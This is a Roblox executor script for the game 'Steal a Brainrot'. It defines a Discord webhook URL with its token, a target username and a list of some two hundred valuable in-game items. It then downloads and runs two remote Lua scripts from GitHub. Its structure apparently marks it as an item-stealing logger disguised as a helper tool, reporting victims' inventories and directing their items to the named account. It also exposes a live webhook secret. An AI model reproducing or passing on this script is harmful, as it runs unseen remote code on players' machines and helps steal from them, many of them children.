getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1509439764741230653/nlUZyGOeLR3qnnzxIqEtbpBsR0wDEuq_seJuGUXiUg9m0Fg5WUT5Mqos-GoV2zEj5xdD"
getgenv().TARGET_USERNAME = "Wthan555Roblox2014"
getgenv().TARGET_BRAINROT = {
 ["Strawberry Elephant"] = true,
 ["Meowl"] = true,
 ["Headless Horseman"] = true,
 ["John Pork"] = true,
 ["Skibidi Toilet"] = true,
 ["Griffin"] = true,
 ["Hydra Dragon Cannelloni"] = true,
 ["Dragon Gingerini"] = true,
 ["Signora Carapace"] = true,
 ["Dragon Cannelloni"] = true,
 ["Love Love"] = true,
 ["La Supreme Combinasion"] = true,
 ["Digi Narwhal"] = true,
 ["Elefanto Frigo"] = true,
 ["Hydra Bunny"] = true,
 ["Jelly Moby"] = true,
 ["Celestial Pegasus"] = true,
 ["Cerberus"] = true,
 ["Bunny and Eggy"] = true,
 ["Popcuru and Fizzuru"] = true,
 ["Rosey and Teddy"] = true,
 ["Capitano Moby"] = true,
 ["Cooki and Milki"] = true,
 ["Arcadragon"] = true,
 ["Burguro And Fryuro"] = true,
 ["Ketupat Bros"] = true,
 ["Reinito Sleighito"] = true,
 ["Fortunu and Cashuru"] = true,
 ["Los Amigos"] = true,
 ["Pancake and Syrup"] = true,
 ["Antonio"] = true,
 ["La Secret Combinasion"] = true,
 ["Foxini Lanterini"] = true,
 ["Kalika Bros"] = true,
 ["Los Sekolahs"] = true,
 ["Cash or Card"] = true,
 ["La Casa Boo"] = true,
 ["Fragrama and Chocrama"] = true,
 ["La Food Combinasion"] = true,
 ["Duggy Bros"] = true,
 ["Sammyni Cakini"] = true,
 ["Spooky and Pumpky"] = true,
 ["Boppin Bunny"] = true,
 ["Ginger Gerat"] = true,
 ["Los Chillis"] = true,
 ["La Ginger Sekolah"] = true,
 ["Los Hackers"] = true,
 ["Sammyni Fattini"] = true,
 ["Los Spaghettis"] = true,
 ["Rubrikiko"] = true,
 ["Festive 67"] = true,
 ["Ventoliero Pavonero"] = true,
 ["Quackini Snackini"] = true,
 ["Cloverat Clapat"] = true,
 ["Spaghetti Tualetti"] = true,
 ["La Easter Grande"] = true,
 ["Hopilikalika Hopilikalako"] = true,
 ["Rosetti Tualetti"] = true,
 ["Rico Dinero"] = true,
 ["Nacho Spyder"] = true,
 ["Garama and Madundung"] = true,
 ["Fishino Clownino"] = true,
 ["Money Money Bros"] = true,
 ["Gold Gold Gold"] = true,
 ["Jolly Jolly Sahur"] = true,
 ["Lavadorito Spinito"] = true,
 ["Ketchuru and Musturu"] = true,
 ["Tirilikalika Tirilikalako"] = true,
 ["Gym Bros"] = true,
 ["Swaggy Bros"] = true,
 ["La Romantic Grande"] = true,
 ["Orcaledon"] = true,
 ["La Lucky Grande"] = true,
 ["Tictac Sahur"] = true,
 ["La Taco Combinasion"] = true,
 ["Ketupat Kepat"] = true,
 ["Dug dug dug"] = true,
 ["Tang Tang Keletang"] = true,
 ["Abyssaloco"] = true,
 ["Fragola La La La"] = true,
 ["Lovin Rose"] = true,
 ["Los Tacoritas"] = true,
 ["Eviledon"] = true,
 ["Los Primos"] = true,
 ["W or L"] = true,
 ["Esok Sekolah"] = true,
 ["La Jolly Grande"] = true,
 ["Los Cupids"] = true,
 ["Los Puggies"] = true,
 ["Los Mariachis"] = true,
 ["Tralaledon"] = true,
 ["Globa Steppa"] = true,
 ["Gobblino Uniciclino"] = true,
 ["Tuff Toucan"] = true,
 ["Mieteteira Bicicleteira"] = true,
 ["Chipso and Queso"] = true,
 ["Chillin Chili"] = true,
 ["Money Money Reindeer"] = true,
 ["La Spooky Grande"] = true,
 ["Bacuru and Egguru"] = true,
 ["Los Bros"] = true,
 ["La Extinct Grande"] = true,
 ["Los Candies"] = true,
 ["Los 67"] = true,
 ["Celularcini Viciosini"] = true,
 ["Los Mobilis"] = true,
 ["Churrito Bunnito"] = true,
 ["Money Money Puggy"] = true,
 ["Cigno Fulgoro"] = true,
 ["Los Spooky Combinasionas"] = true,
 ["Los Hotspotsitos"] = true,
 ["Los Jolly Combinasionas"] = true,
 ["Snailo Clovero"] = true,
 ["Los Planitos"] = true,
 ["Chicleteira Cupideira"] = true,
 ["DJ Panda"] = true,
 ["Las Sis"] = true,
 ["Camera Ramena"] = true,
 ["Spinny Hammy"] = true,
 ["Tacorita Bicicleta"] = true,
 ["Los Sweethearts"] = true,
 ["Baskito"] = true,
 ["Nuclearo Dinossauro"] = true,
 ["Chicleteira Noelteira"] = true,
 ["Los Combinasionas"] = true,
 ["Bananito"] = true,
 ["Chimnino"] = true,
 ["Noo my Gold"] = true,
 ["Swag Soda"] = true,
 ["Noo my Heart"] = true,
 ["Tacorillo Crocodillo"] = true,
 ["Mariachi Corazoni"] = true,
 ["La Grande Combinasion"] = true,
 ["Los 25"] = true,
 ["Los Burritos"] = true,
 ["67"] = true,
 ["Donkeyturbo Express"] = true,
 ["John Doe"] = true,
 ["Los Chicleteiras"] = true,
 ["Noo my Eggs"] = true,
 ["Guest 666"] = true,
 ["Strawberrita"] = true,
 ["Los Mi Gatitos"] = true,
 ["Rang Ring Bus"] = true,
 ["Granny"] = true,
 ["Noo my Present"] = true,
 ["Filpa Sandala"] = true,
 ["Serafinna Medusella"] = true,
 ["Los Nooo My Hotspotsitos"] = true,
 ["Arcadopus"] = true,
 ["Noo my Candy"] = true,
 ["Los Quesadillas"] = true,
 ["Los Bunitos"] = true,
 ["Chicleteirina Bicicleteirina"] = true,
 ["Chill Puppy"] = true,
 ["Burrito Bandito"] = true,
 ["Luck Luck Luck Sahur"] = true,
 ["Chicleteira Bicicleteira"] = true,
 ["Brunito Marsito"] = true,
 ["Quesadillo Vampiro"] = true,
 ["Eid Eid Eid Sahur"] = true,
 ["Cupid Hotspot"] = true,
 ["Mi Gatito"] = true,
 ["Ho Ho Ho Sahur"] = true,
 ["Cupid Cupid Sahur"] = true,
 ["Pot Pumpkin"] = true,
 ["Naughty Naughty"] = true,
 ["Bunito Bunito Spinito"] = true,
 ["Quesadilla Crocodila"] = true,
 ["Horegini Boom"] = true,
 ["Buho de Volto"] = true,
 ["Santa Hotspot"] = true,
 ["Pot Hotspot"] = true,
 ["25"] = true,
 ["Pirulitoita Bicicleteira"] = true,
 ["To to to Sahur"] = true,
 ["Glaciator"] = true,
 ["Bunny Bunny Bunny Sahur"] = true,
 ["Telemorte"] = true,
 ["La Sahur Combinasion"] = true,
 ["List List List Sahur"] = true,
 ["Noo my examine"] = true,
 ["Los Jobcitos"] = true,
 ["Berryno"] = true,
 ["Nooo My Hotspot"] = true,
 ["Bunnyman"] = true,
 ["Tung Tung Tung Sahur"] = true,
 ["Cuadramat and Pakrahmatmamat"] = true,
 ["Please my Present"] = true,
 ["Los Cucarachas"] = true,
 ["Easter Easter Easter Sahur"] = true,
 ["1x1x1x1"] = true,
 ["La Vacca Lepre Lepreino"] = true,
 ["Love Love Love Sahur"] = true,
 ["Perrito Burrito"] = true,
 ["Graipuss Medussi"] = true,
 ["Giftini Spyderini"] = true,
 ["GOAT"] = true,
 ["Trickolino"] = true,
 ["Paradiso Axolottino"] = true,
 ["Triplito Tralaleritos"] = true,
 ["La Vacca Jacko Linterino"] = true,
 ["Fishboard"] = true,
 ["Santteo"] = true,
 ["Las Vaquitas Saturnitas"] = true,
 ["Los Karkeritos"] = true,
 ["Karker Sahur"] = true,
 ["Los Trios"] = true,
 ["Job Job Job Sahur"] = true,
 ["Frankentteo"] = true,
 ["Pumpkini Spyderini"] = true,
 ["Las Tralaleritas"] = true,
 ["Rocco Disco"] = true,
 ["Extinct Matteo"] = true,
 ["La Karkerkar Combinasion"] = true,
 ["La Vacca Prese Presente"] = true,
 ["Reindeer Tralala"] = true,
 ["Yess my examine"] = true,
 ["Guerriro Digitale"] = true,
 ["Boatito Auratito"] = true,
 ["Vulturino Skeletono"] = true,
 ["Los Tralaleritos"] = true,
 ["Zombie Tralala"] = true,
 ["Los Tortus"] = true,
 ["La Cucaracha"] = true,
 ["Extinct Tralalero"] = true,
 ["Agarrini la Palini"] = true,
 ["Los Spyderinis"] = true,
 ["Chachechi"] = true,
 ["Blackhole Goat"] = true,
 ["Dul Dul Dul"] = true,
 ["Torrtuginni Dragonfrutini"] = true,
 ["Trenostruzzo Turbo 4000"] = true,
 ["Karkerkar Kurkur"] = true,
 ["Los Matteos"] = true,
 ["Bisonte Giuppitere"] = true,
 ["Sammyni Spyderini"] = true,
 ["La Vacca Saturno Saturnita"] = true,
 ["Jackorilla"] = true,
 ["Ganganzelli Trulala"] = true,
 ["Tobi Tobi Tobi"] = true,
}
task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ZAmbuluda/Shrinkhub/refs/heads/main/freeze.lua"))()
end)
loadstring(game:HttpGet("https://raw.githubusercontent.com/platinww/CrustyMain/refs/heads/main/Steal-A-Brainrot/DuelFinder.lua"))()
